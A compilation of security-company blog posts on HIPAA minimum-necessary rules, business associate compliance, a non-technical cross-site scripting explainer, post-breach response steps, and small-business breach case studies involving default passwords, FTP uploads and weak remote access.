5 Things You Should Know About Minimum Necessary PHI

“All this is on a strictly need-to-know basis. As in, nobody else needs to know.” –Kami Garcia.

Tod Ferran, Security Analyst
By: Tod Ferran
There aren’t many times in life where you can get away with doing the bare minimum. PHI is one of them. Here are 5 things you should know about the minimum necessary HIPAA requirement.


1. PHI should only be shared on a need-to-know basis.

In military operations, a need-to-know restriction is the control of extremely sensitive information by only those who must know the information to get the job done. Although thousands of personnel are involved in planning battles, only a small number (usually high-ranking officers) have the security clearance to know everything about the operation. The rest are only informed on parts of the plan necessary to get their specific task completed.

Protected health information (PHI) is kind of like a sensitive battle plan. Instead of the need-to-know restriction, the HHS calls this control the minimum necessary requirement. The HHS says this requirement is “based on sound current practice that protected health information should not be used or disclosed when it is not necessary to satisfy a particular purpose or carry out a function.”

Only those who need to see PHI to do their jobs should get to see it, and unless you have a specific need for the information, access must be restricted. For example, a receptionist (or someone that doesn’t provide direct patient care) probably doesn’t need to see the X-rays of a patient to do his or her job.

By limiting PHI access to the smallest number of people possible, the likelihood of a breach or impermissible disclosure of HIPAA violation decreases significantly.Tweet: Limiting PHI access to the smallest # of people possible decreases likelihood of a HIPAA breach. http://bit.ly/1sxhAX7Tweet

2. Limit user access by creating individual user accounts.

The HHS states, “if a hospital employee is allowed to have routine, unimpeded access to patients’ medical records, where such access is not necessary for the hospital employee to do his job, the hospital is not applying the minimum necessary standard.”

It’s a covered entity’s responsibility to limit who within the organization has access to each specific part or component of PHI. The easiest way to take charge of the data is by creating individual user accounts.

SEE ALSO: Everyone Is Not Created Equal In Healthcare

In the ideal scenario, each user account in a network, EHR, or computer system, would be given certain privileges based on the job title or role of the user. For example, a “doctor” privilege would get access to all PHI in their patient database, because they need it to do their job. An “IT admin” would have restricted access to PHI, because they are not involved with patient care.

3. Covered entities pass way too much data to their business associates.

The minimum necessary requirement doesn’t just apply to an organization. It applies to the information shared externally, with third parties and subcontractors. Entities are required to limit how much PHI is disclosed based on job responsibilities and nature of the third party’s business.

Say a patient needed a prosthetic leg. If a hospital sent the entire patient record to the prosthetic manufacturer (their business associate), the hospital would be violating the minimum necessary requirement. The prosthetic manufacturer doesn’t need to know about the patient’s flu shot 10 years ago. All he needs to know are the specifics for the prosthetic required for him to correctly do his job.

SEE ALSO: You Can't Hide Behind a Business Associate Agreement

Passing too much PHI to a business associate could get your organization slapped with a fine. Be careful about how much data you are sending and receiving.


4. Don’t worry about passing too much data when talking to other doctors.

If you’re communicating doctor to doctor, don’t worry. You get a free pass. The minimum necessary rule is a little different if you’re communicating with someone who actually provides healthcare to patients.

Because many ailments, treatments, and medications are related, most situations require the entire medical history to be sent from doctor to doctor. Just remember to use your best judgment.

5. Both entities and business associates are responsible for the minimum necessary requirement.

I’ve witnessed many business associates tell their covered entity partners they get to decide how much data they receive, and it’s the covered entity’s responsibility to just ship it all over. Au contraire Mr. Business Associate!

Each party (covered entity and business associate) has a minimum necessary responsibility under HIPAA. That means either party can be fined by the HHS for misapplying (or completely disregarding) the minimum necessary rule. If a business associate demands more data than is necessary from its covered entities, it could be fined for ignoring the rules.

Let me clear up any confusion about your responsibility concerning minimum necessary data:
  • Covered entity responsibility: determine what data is the minimum necessary to send, and then only send that data and nothing else.
  • Business associate responsibility: only accept and use the minimum necessary data.
Just remember: Less is more when it comes to sharing PHI.

Did this post help you? If so, please share!

Tod Ferran (CISSP, QSA) is a Security Analyst for SecurityMetrics with 25 years of IT security experience. He provides security consulting, risk analysis assistance, risk management plan support, and performs HIPAA and PCI compliance audits. Check out his other blog posts.
Cross-Site Scripting, Explained

One of the most common website attacks that most businesses have never heard of.

Brand Barney, Security Analyst
By: Brand Barney
Cross-site scripting (also known as XSS) allows bad guys to embed malicious code into a legitimate (but vulnerable) website to ultimately gather user data like credit cards or passwords.



Want to see more vids like this? Subscribe on YouTube for more security tips.

How does cross-site scripting work? Here’s an example of one type of XSS.

  • The hacker finds a legitimate webpage with an input field. Input fields could range from a first name field to a credit card field. 
  • The hacker checks if the webpage is vulnerable to cross-site scripting. For this type of attack to work, the web application must use the data the user enters and echo it back to the user. For example, if you sign in with your username (say, example123) and the webpage says something like, “Welcome example123!”, that webpage is echoing your data back to you.
  • The hacker embeds malicious script. Based on the JavaScript they enter in the comments fields, hackers can capture the keystrokes of the user, steal usernames or passwords entered into the fields, or even copy the entire webpage and redirect users to a fake webpage. 
  • The hacker sits back and waits. When a user visits the web page (usually through a bad URL), the JavaScript executes on his or her browser (stealing all manner of sensitive data). Users usually have no idea this is happening. 
SEE ALSO: The Case of the Evil JavaScript


Is my website vulnerable to cross-site scripting?

Possibly. I estimate that 1/3 of all websites are susceptible to XXS.
XSS is a huge flaw in many websites if left untested and not properly avoided.Tweet: XSS is a huge flaw in many websites if left untested and not properly avoided. http://bit.ly/Xq8EdV #itsecurityTweet

How to stop cross-site scripting on your website

  • Run external vulnerability scans. Vulnerability scans help locate coding errors where XSS vulnerabilities may occur.
  • Talk to your web developer and make sure your site is properly coded with security in mind. 
Ask your business security question in the comments!


Brand Barney (CISSP) is a Security Analyst at SecurityMetrics and has over 10 years of compliance, data security, and database management experience. Follow him on Twitter and check out his other blog posts.
You Can’t Hide Behind a Business Associate Agreement

What it really means to maintain BA HIPAA compliance

Tod Ferran, Security Analyst
By: Tod Ferran
This article was also featured in HITECH Answers.

During the last few months of auditing various HIPAA environments, I’ve seen three distinct groups of covered entities that have responded to new HIPAA Omnibus requirements regarding business associates.
  • Group #1: Most common. They’ve chosen to completely ignore the new requirement to update all business associate agreements (BAA). Perhaps they are lazy, busy, or worried that asking for a new signature might negatively affect the relationship or open the door for the BA to negotiate new terms.
  • Group #2: Up and coming. They slowly work to update and encourage signing of all agreements, but believe that’s all it takes to become compliant.
  • Group #3: Practically nonexistent. They diligently work to ensure business associates are truly HIPAA compliant and securely handling patient data before accepting any new/updated agreements and before transmitting any electronic protected health information (ePHI) to the BA.
Want to take a guess which group you should be in?

Covered entities don’t have the option to hide behind BAA if a Health and Human Services (HHS) auditor comes knocking. This tactic may have worked before September 2013, but the HHS specifically stated in new HIPAA documentation that covered entities are required to take dual-responsibility for patient data protection, and signing a new agreement just isn’t enough anymore. The HHS calls this new business associate responsibility ‘obtaining satisfactory assurances.

SEE ALSO: What to Expect With Upcoming HHS Audits

Though government documentation does little to explain the phrase, ‘satisfactory assurances’ essentially means covered entities must personally take measures to check BA patient data handling processes and review BA security measures. To meet this requirement, some covered entities require proof of a completed risk analysis or personally request the implementation of a standard risk management plan. Others track all business associates with a compliance-monitoring tool.

It’s common sense

The logic behind the new rule is quite sound when you think about it. The new rule prevents business associates from signing contracts without actually implementing HIPAA practices.
Would you give a teenager who failed the driving test the keys to your car if they promised they’d be careful? The HHS wouldn’t.Tweet: Would you give a failed driver's ed student the keys to your car? The HHS wouldn’t. http://bit.ly/1AGZiHu via @SecurityMetrics #HIPAATweet
You have been assigned the part of the responsible parent, and if you willfully neglect that responsibility, the HHS may come after you to the tune of $50,000 minimum per violation.

BA best practices

Don't get me wrong, I’m not trying to downplay the importance of business associate agreements. After all, they are still required as per HIPAA rules. Just remember patient data is so important that you may need to consider dropping business associates that choose to ignore compliance best practices. With recent class-action lawsuits seeking $1,000 per compromised individual, it’s worth it to be choosey.

Here’s the moral of the story. The new HIPAA Omnibus rule isn’t just about signing a new BAA. Every covered entity with business associates (virtually all of you) is required to obtain assurances that their business associates treat patient data the way the HHS wants them to, and the way you want them to. Whether you choose to personally audit each BA, or require documented data security procedures, take the initiative to secure the future of your organization and safety of patient data.




Tod Ferran (CISSP, QSA) is a Security Analyst for SecurityMetrics with 25 years of IT security experience. He provides security consulting, risk analysis assistance, risk management plan support, and performs HIPAA and PCI compliance audits. Check out his other blog posts.
What To Do If Your Business Is Hacked

If your organization is compromised, you’re not powerless.

Brand Barney, Security Analyst
By: Brand Barney
Small businesses are the target of many compromises. In fact, according to Symantec, cyber attacks on small businesses rose 300% in 2012 from the previous year.

Many business owners call us in a panic after learning their retail location or website has been hacked. Terrified, these merchants literally have no idea what to do. 

But you CAN do something after a breach! Even though you’re not a security expert, there are a few To Do’s that might actually help reduce any compromise penalties you may encounter. I personally know of a few instances in which the card brands (Visa, MasterCard, etc.) reduced compromise penalties because a hacked merchant acted proactively immediately following the breach. 

In the video below, I give some guidance on what you personally can do if you suspect a breach.


Want to see more vids like this? Subscribe on YouTube for more security tips.

Recap: what to do when you are hacked (or suspect you’ve been hacked)

  • Contain the breach to minimize its impact
    • Stop use of all compromised systems
    • Revert to telephone dial out terminals
    • Pull your online shopping cart offline
    • Disconnect the Internet. (If you are connected via modem, unplug the modem cable, if you are connected via Ethernet, unplug the Ethernet)
    • Change all passwords
  • Contact appropriate parties
    • IT staff, developer, and/or hosting provider
    • Merchant processor
    • Local authorities
    • Lawyer
    • Request a forensic investigator
  • Take advantage of your compromise reimbursement program

Have a business security question? Ask me below.

Brand Barney (CISSP) is a Security Analyst at SecurityMetrics and has over 10 years of compliance, data security, and database management experience. Follow him on Twitter and check out his other blog posts.
Security Blunder Case Studies

These three businesses had no idea it was coming.

David Ellis, Director of Forensic Investigations
By: David Ellis
This article was also featured in Multi-Unit Franchisee: “Prevent Hacking Horror Stories

We hear hacking horror stories every day. Businesses around the world call us in a panic, needing to decipher what went wrong with their security. I thought I’d share some details from actual incidents. Unfortunately, these miscues are common in many small businesses. My hope is, after reading about these security failures, you will see actions you can take to enhance your own security.

#1: Pass the pepperoni and passwords, please

This first incident involved several small pizza chains that utilized the same restaurant management software, and point of sale (POS) hardware/software. Sadly, hundreds of those restaurants were hacked.

Once each restaurant’s POS system was configured, the local restaurant owners did not change the default POS password set by the payment application vendor. A hacker easily deduced the password, infiltrated each POS system and installed a memory scraper.

SEE ALSO: Vendor-Supplied Defaults Are a Serious Threat

A memory scraper is malware (malicious software) designed to ‘scrape’ sensitive information from system memory (RAM). This memory scraper was specifically designed to scrape customer credit card information from each restaurant’s POS system. Thousands of pizza-lovers’ credit cards were stolen.

Moral: Don’t leave your passwords in their default state

It’s typical for POS terminals and other software/hardware solutions to begin their lifecycle with default passwords. Default passwords make it easy for IT vendors to install a system without learning a new password each time. The problem is that default passwords are often simple to guess, and many are even published on the Internet.

Passwords should be changed every 90 days, contain at least 10 upper AND lower case letters, AND numbers, AND special characters. Passwords that fall short of these criteria can usually be broken using a password-cracking tool.Tweet: Passwords without these criteria can usually be broken using a password-cracking tool. http://bit.ly/1u78G6Z via @SecurityMetricsTweet
SEE ALSO: HIPAA Compliant Passwords

#2: A picture is worth a thousand hacks

A popular website hosting service gave customers the ability to log in to their corporate server to upload website images through the file transfer protocol (FTP) feature. An attacker hacked the FTP upload and uploaded malicious code onto the host’s servers.

Because the web-hosting service had access to each of its customers’ websites, every client website was infected with malware designed to capture credit card information from checkout pages.

Moral: Don’t invite customers to waltz into your corporate server

Why was the hacker able to access credit card information in multiple accounts through a picture uploader? The main problems in this scenario were a lack of network segmentation and lack of understanding that FTP is inherently insecure. The web-hosting service shouldn’t have utilized FTP, and should have segmented their customer’s accounts from one another.

Segmentation is the act of using firewall technology to compartmentalize network areas that contain sensitive information (like customer credit cards) from those that don’t.


#3: Compromise is just a password away

An unfortunate franchisee with hundreds of high dollar restaurants hired an IT company to configure their remote access systems across multiple locations.

Remote access is the ability to access a computer or server from a remote location. It’s often used in mid-large organizations among employees who need access to shared files and company networks, or by business owners logging in from home to view the day’s receipts. Popular remote access applications include pcAnywhere, VNC, LogMeIn, TeamViewer.

SEE ALSO: Securing Remote Access in Healthcare Environments

The IT company configured the remote access application with a single username and password authentication for each restaurant location. Once a hacker discovered the username and password for one location, he was then able to download malware into all of the restaurant’s POS systems. This resulted in the theft of thousands of customer credit cards.

Moral: Remote access is only as secure as its authentication

This hack could easily have been prevented if the franchisee had complied with the Payment Card Industry Data Security Standard (PCI DSS), which mandates that all remote access into the cardholder environment requires two-factor authentication. This means in addition to entering a username and complex password, you must also complete a second secure login step, such as physically calling an onsite manager to be granted a remote session, entering a one-time authentication code sent to a specific cell phone, or matching unique client-side certificate files.

Summary

In my experience, these scenarios highlight common problems in small business credit card security. I encourage you to check your system to see if one or more of these security vulnerabilities exist. Look for default or non-complex passwords, install security patches and updates, configure your payment application securely, segment your credit card processing network from all other networks, and ensure your remote access requires two-factor authentication.

If you liked this post, please share!

David Ellis (GCIH, QSA, PFI, CISSP) is Director of Forensic Investigations at SecurityMetrics with over 25 years of law enforcement and investigative experience. Check out his other blog posts.